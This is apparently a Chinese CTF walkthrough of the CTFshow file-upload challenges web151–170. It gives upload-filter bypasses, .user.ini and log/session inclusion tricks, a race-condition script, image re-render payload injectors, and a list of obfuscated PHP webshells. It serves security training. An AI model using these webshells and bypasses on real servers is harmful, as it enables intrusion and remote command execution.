• CTFshow Web入门 文件上传

    目录

    web151

    web152

    web153

    web154

    web155

    web156

    web157

    web158、web159

    web160

    web161

    web162

    web163

    web164

    web165

    web166

    web167

    web168

    web169

    web170

    web151

    1.

    写马改后缀为png上传,抓包修改文件信息

    回显路径,蚁剑连接

    2.

    先构造一句话木马php文件

    修改前端,然后上传php文件

     进入路径

    POST传参, 命令执行

    web152

    1.web151的方法可以白嫖

    2.前端不能修改,抓包修改后缀 

    上传成功后就和web151 2一样了

    web153

    .user.ini,上传一个图片马,然后上传.user.ini,使得当前目录下的所有php文件都去包含这个含有木马的图片。因为.user.ini只对它同一目录下的文件起作用,并且/upload/下存在index.php文件,所以上传之后直接去访问index.php才有效果,当访问index.php的时候,首先回去包含这张带有木马的图片,上传图片马,抓包改后缀

    上传.user.ini

    蚁剑直接连接/upload/index.php,密码是cmd

    web154

    上传一个文件马的时候回显文件内容不合规,对文件内容进行了限制

    经过测试发现是对php进行了限制,使用短标签,上传完图片马,还是要上传.user.ini

    依旧是连接/upload/index.php,发现了flag

    web155

    过滤了php关键字,使用短标签 

    访问路径

    命令执行

    web156

    过滤了[],使用{}代替,上传一句话木马和.user.ini

     

    上传成功进入路径 

    POST传参,命令执行

     

    web157

    经过测试发现过滤了;、[]、{},直接传命令执行,还是先传.user.ini再传index.png

    上传成功得到路径,访问路径

    web158、web159

    web157的方法可以通杀

    web160

    日志包含,过滤了关键词log,上传png文件和.user.ini 

    上传成功进入upload,在UA中直接命令执行 ,我执行了两次才回显出flag

    web161

    检测了文件头,增加文件头GIF89a绕过,上传index.png和.user.ini

    上传成功进入upload,然后修改UA,命令执行

    web162

    session文件包含、条件竞争 

    1. import requests
    2. import threading
    3.  
    4. session = requests.session()
    5. sess = 'yu22x'
    6. url1 = "http://c00d1119-5295-4db1-b613-9b9f3047a91e.challenge.ctf.show/"
    7. url2 = "http://c00d1119-5295-4db1-b613-9b9f3047a91e.challenge.ctf.show/upload"
    8. data1 = {
    9.     'PHP_SESSION_UPLOAD_PROGRESS': ''
    10. }
    11. file = {
    12.     'file': 'yu22x'
    13. }
    14. cookies = {
    15.     'PHPSESSID': sess
    16. }
    17.  
    18.  
    19. def write():
    20.     while True:
    21.         r = session.post(url1, data=data1, files=file, cookies=cookies)
    22.  
    23.  
    24. def read():
    25.     while True:
    26.         r = session.get(url2)
    27.         if 'flag' in r.text:
    28.             print(r.text)
    29.  
    30.  
    31. threads = [threading.Thread(target=write),
    32.            threading.Thread(target=read)]
    33. for t in threads:
    34.     t.start()

    web163

    include url文件包含,直接在.user.ini配置文件中远程包含

    然后去访问/upload/,进行然后就可以1=system("tac ../flag.php");,由于我没有VPS所以做不出来

    web164

    2. $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    3.            0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    4.            0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    5.            0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    6.            0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    7.            0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    8.            0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    9.            0x66, 0x44, 0x50, 0x33);
    10.  
    11.  
    12.  
    13. $img = imagecreatetruecolor(32, 32);
    14.  
    15. for ($y = 0; $y < sizeof($p); $y += 3) {
    16.    $r = $p[$y];
    17.    $g = $p[$y+1];
    18.    $b = $p[$y+2];
    19.    $color = imagecolorallocate($img, $r, $g, $b);
    20.    imagesetpixel($img, round($y / 3), 0, $color);
    21. }
    22.  
    23. imagepng($img,'xxx');  //要修改的图片的路径
    24.  
    25. /* 木马内容
    27.  */
    28.  
    29. ?>

    放包,然后传参

    传参完了之后,ctrl+s保存为txt类型的,里面就有flag

    web165

    发现需要jpg二次渲染,图片要用特定的图片,下面这一张就是二次渲染专用图片

    我们首先要上传到服务端,因为服务端会进行一次渲染,改动最小,然后保存为所有格式名称后缀为.jpg的图片,利用脚本生成二次渲染的图片

    2.     /*
    4.     The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    5.     It is necessary that the size and quality of the initial image are the same as those of the processed image.
    7.     1) Upload an arbitrary image via secured files upload script
    8.     2) Save the processed image and launch:
    9.     jpg_payload.php 
    11.     In case of successful injection you will get a specially crafted image, which should be uploaded again.
    13.     Since the most straightforward injection method is used, the following problems can occur:
    14.     1) After the second processing the injected data may become partially corrupted.
    15.     2) The jpg_payload.php script outputs "Something's wrong".
    16.     If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.
    18.     Sergey Bobrov @Black2Fan.
    20.     See also:
    21.     https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
    23.     */
    24.  
    25.     $miniPayload = "";
    26.  
    27.  
    28.     if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    29.         die('php-gd is not installed');
    30.     }
    31.  
    32.     if(!isset($argv[1])) {
    33.         die('php jpg_payload.php ');
    34.     }
    35.  
    36.     set_error_handler("custom_error_handler");
    37.  
    38.     for($pad = 0; $pad < 1024; $pad++) {
    39.         $nullbytePayloadSize = $pad;
    40.         $dis = new DataInputStream($argv[1]);
    41.         $outStream = file_get_contents($argv[1]);
    42.         $extraBytes = 0;
    43.         $correctImage = TRUE;
    44.  
    45.         if($dis->readShort() != 0xFFD8) {
    46.             die('Incorrect SOI marker');
    47.         }
    48.  
    49.         while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
    50.             $marker = $dis->readByte();
    51.             $size = $dis->readShort() - 2;
    52.             $dis->skip($size);
    53.             if($marker === 0xDA) {
    54.                 $startPos = $dis->seek();
    55.                 $outStreamTmp = 
    56.                     substr($outStream, 0, $startPos) . 
    57.                     $miniPayload . 
    58.                     str_repeat("\0",$nullbytePayloadSize) . 
    59.                     substr($outStream, $startPos);
    60.                 checkImage('_'.$argv[1], $outStreamTmp, TRUE);
    61.                 if($extraBytes !== 0) {
    62.                     while((!$dis->eof())) {
    63.                         if($dis->readByte() === 0xFF) {
    64.                             if($dis->readByte() !== 0x00) {
    65.                                 break;
    66.                             }
    67.                         }
    68.                     }
    69.                     $stopPos = $dis->seek() - 2;
    70.                     $imageStreamSize = $stopPos - $startPos;
    71.                     $outStream = 
    72.                         substr($outStream, 0, $startPos) . 
    73.                         $miniPayload . 
    74.                         substr(
    75.                             str_repeat("\0",$nullbytePayloadSize).
    76.                                 substr($outStream, $startPos, $imageStreamSize),
    77.                             0,
    78.                             $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
    79.                                 substr($outStream, $stopPos);
    80.                 } elseif($correctImage) {
    81.                     $outStream = $outStreamTmp;
    82.                 } else {
    83.                     break;
    84.                 }
    85.                 if(checkImage('payload_'.$argv[1], $outStream)) {
    86.                     die('Success!');
    87.                 } else {
    88.                     break;
    89.                 }
    90.             }
    91.         }
    92.     }
    93.     unlink('payload_'.$argv[1]);
    94.     die('Something\'s wrong');
    95.  
    96.     function checkImage($filename, $data, $unlink = FALSE) {
    97.         global $correctImage;
    98.         file_put_contents($filename, $data);
    99.         $correctImage = TRUE;
    100.         imagecreatefromjpeg($filename);
    101.         if($unlink)
    102.             unlink($filename);
    103.         return $correctImage;
    104.     }
    105.  
    106.     function custom_error_handler($errno, $errstr, $errfile, $errline) {
    107.         global $extraBytes, $correctImage;
    108.         $correctImage = FALSE;
    109.         if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
    110.             if(isset($m[1])) {
    111.                 $extraBytes = (int)$m[1];
    112.             }
    113.         }
    114.     }
    115.  
    116.     class DataInputStream {
    117.         private $binData;
    118.         private $order;
    119.         private $size;
    120.  
    121.         public function __construct($filename, $order = false, $fromString = false) {
    122.             $this->binData = '';
    123.             $this->order = $order;
    124.             if(!$fromString) {
    125.                 if(!file_exists($filename) || !is_file($filename))
    126.                     die('File not exists ['.$filename.']');
    127.                 $this->binData = file_get_contents($filename);
    128.             } else {
    129.                 $this->binData = $filename;
    130.             }
    131.             $this->size = strlen($this->binData);
    132.         }
    133.  
    134.         public function seek() {
    135.             return ($this->size - strlen($this->binData));
    136.         }
    137.  
    138.         public function skip($skip) {
    139.             $this->binData = substr($this->binData, $skip);
    140.         }
    141.  
    142.         public function readByte() {
    143.             if($this->eof()) {
    144.                 die('End Of File');
    145.             }
    146.             $byte = substr($this->binData, 0, 1);
    147.             $this->binData = substr($this->binData, 1);
    148.             return ord($byte);
    149.         }
    150.  
    151.         public function readShort() {
    152.             if(strlen($this->binData) < 2) {
    153.                 die('End Of File');
    154.             }
    155.             $short = substr($this->binData, 0, 2);
    156.             $this->binData = substr($this->binData, 2);
    157.             if($this->order) {
    158.                 $short = (ord($short[1]) << 8) + ord($short[0]);
    159.             } else {
    160.                 $short = (ord($short[0]) << 8) + ord($short[1]);
    161.             }
    162.             return $short;
    163.         }
    164.  
    165.         public function eof() {
    166.             return !$this->binData||(strlen($this->binData) === 0);
    167.         }
    168.     }
    169. ?>

    抓包将GET方法变成POST方法,然后写入马,然后命令执行1=system("tac flag.php");

    web166

    web167

    访问上传了的1.png文件,然后利用POST的1来进行命令执行

    发现了flag.php,tac抓一下flag.php

    web168

    免杀,下面是常用的免杀脚本,抓包上传

    1. 脚本1:
    2. `$_REQUEST[1]`;?>    //利用反引号执行系统命令
    3.  
    4. 脚本2:
    6. $a=$_REQUEST['a']; 
    7. $b=$_REQUEST['b'];
    8. $a($b);
    9. ?> 
    10.  
    11. //a=system&b=tac ../flagaa.php
    12.  
    13. 脚本3:
    14.  $a='syste'.'m';($a)('ls ../');    //拼接
    15.  
    16. //把ls ../换成tac ../flagaa.php即可找到flag
    17.  
    18. 脚本4:
    19.  
    20. $a = "s#y#s#t#e#m";
    21. $b = explode("#",$a);
    22. $c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
    23. $c($_REQUEST[1]);
    24. ?>
    25. //c相当于system,给1赋值参数即可
    26.  
    27. 脚本5:
    28.  $a=substr('1s',1).'ystem'; $a($_REQUEST[1]); ?>
    29.  
    30. 脚本6:
    31.  $a=strrev('metsys'); $a($_REQUEST[1]); ?>
    32.  
    33.  
    34. 脚本7:
    35. $pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi{abs})($$pi{acos});
    36. #数字函数  get传参   abs=system&acos=tac ../flagaa.php

    上传成功访问upload/1.php

    参数执行,列一下目录

    在flagaa.php中发现了flag

    web169

    发现只能上传zip文件 

    但是直接上传zip文件,回显文件类型不合规

    经测试发现,Content-Type:image/png可以上传成功

    但是同时也过滤了<、>、?、$等

    使用.user.ini进行日志包含,在UA写入一句话木马

    上传成功,访问upload/1.php

    命令执行就可以了

     

    web170

    和web169类似,这次使用蚁剑来做,查看源码发现还是只能上传zip

    经过测试发现禁用了<、>、?、$、php、eval等,还是利用.user.ini进行日志包含

    使用蚁剑连接,http:xxxxx/upload/1.php,密码shell

    在flagaa.php中发现了flag

  • 相关阅读:
    623. 在二叉树中增加一行
    【软件设计师21天-考点整理】6)计算机系统构成及硬件基础知识
    汽车UDS诊断之读取DTC(19h 02h)子功能深度剖析
    Django(6):详解Django路由设计
    如何用Python和NLTK有效地总结文本
    5.RabbitMQ高级特性
    【开发篇】七、RedisTemplate与StringRedisTemplate + Jedis与Lettcus
    向AI提问,我是怎么做的?
    javase----java基础面试题01-05
    Gradio 最快创建Web 界面部署到服务器并演示机器学习模型,本文提供教学案例以及部署方法,避免使用繁琐的django
  • 原文地址:https://blog.csdn.net/m0_62905261/article/details/127479999